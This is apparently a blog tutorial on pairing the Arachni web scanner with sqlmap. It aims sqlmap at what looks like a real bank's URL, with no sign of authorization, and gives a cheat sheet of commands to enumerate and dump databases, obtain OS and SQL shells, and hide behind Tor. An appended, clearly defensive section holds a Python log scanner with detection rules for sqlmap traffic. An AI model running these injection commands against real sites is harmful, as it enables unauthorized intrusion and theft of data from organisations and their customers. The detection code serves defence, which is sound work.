SQLMAP With Arachni Scanner

Requirements:

OS: Windows 10
Compiler : Python 3.x
Script : SQLMAP
Scanner: Arachni Scanner

Step 1:- Download And Install "Arachni Scanner".
    https://www.arachni-scanner.com/download/

Step 2:- Open The Browser And Navigate To "https://localhost:9292/users/sign_in/"

To Start A "New Scan", Click The "+New" Icon.

Click On Go For "Scanning".


Here The "Scanning Starts".


 

Scan "Completed" And To "Download Report", Choose The Format And "Click Ok".



Step 3:- Open "Web Browser" And "Check One Time Again".

Step 4:- Follow My Previous Post On "SQL MAP" To Find A Target. Navigate To The SQL MAP Folder In "PowerShell" And Execute The "Following Command".

    python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B0219F2C-951C-B9F7-D1B6-805BA07752DB57D" –dbs

Step 5:- Follow The Same Steps As In My Previous Post On SQL MAP To Find "Database Names", "Table Names" And "Dump The Tables". Just Add The Following Option In It:-


SQL MAP OPTIONS


# Check Whether The Web Site Returns An SQL Error.
    Simply Put (", ', -).

# Enumerate Databases.
    sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate Tables.
    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump Table Data.
    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

# Specify Parameter To Exploit.
    sqlmap --dbms=mysql -u "http://www.example.com/?param1=value1&param2=value2" --dbs -p param2

# Specify Parameter To Exploit In 'Nice' URIs.
    sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

# Get OS Shell.
    sqlmap --dbms=mysql -u "$URL" --os-shell

# Get SQL Shell.
    sqlmap --dbms=mysql -u "$URL" --sql-shell
    
# SQL Query.
    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

# Use Tor Socks5 Proxy.
    sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
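
Seen from the server side, the quote check and the enumeration options above leave recognizable traces in web access logs. The following is an added example, not part of the original post: it flags those traces in "combined" format log lines. The log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/Nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php?route=common/page&pageid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.23 - - [10/Oct/2024:13:56:01 +0000] "GET /index.php?pageid=12%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.23 - - [10/Oct/2024:13:56:09 +0000] "GET /index.php?pageid=12%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 4801 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.23 - - [10/Oct/2024:13:56:15 +0000] "GET /index.php?pageid=12%20AND%20(SELECT%20COUNT(schema_name)%20FROM%20INFORMATION_SCHEMA.SCHEMATA)%3E0 HTTP/1.1" 200 4801 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Each rule receives the URL-decoded query string, the User-Agent and the status code.
RULES = {
    "sqlmap-user-agent": lambda q, ua, st: ua.lower().startswith("sqlmap/"),
    "union-select": lambda q, ua, st: re.search(r"\bunion\s+(all\s+)?select\b", q, re.I) is not None,
    "schema-enumeration": lambda q, ua, st: "information_schema" in q.lower(),
    "quote-probe-5xx": lambda q, ua, st: st >= 500 and q.rstrip().endswith(("'", '"')),
}

def scan(log_text):
    """Return {client_ip: sorted list of rule names that fired}."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = unquote_plus(m["target"].partition("?")[2])
        for name, rule in RULES.items():
            if rule(query, m["ua"], int(m["status"])):
                hits.setdefault(m["ip"], set()).add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The User-Agent rule only catches clients that keep the tool's default header, so the payload and status-code rules are the ones to tune against your own traffic.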
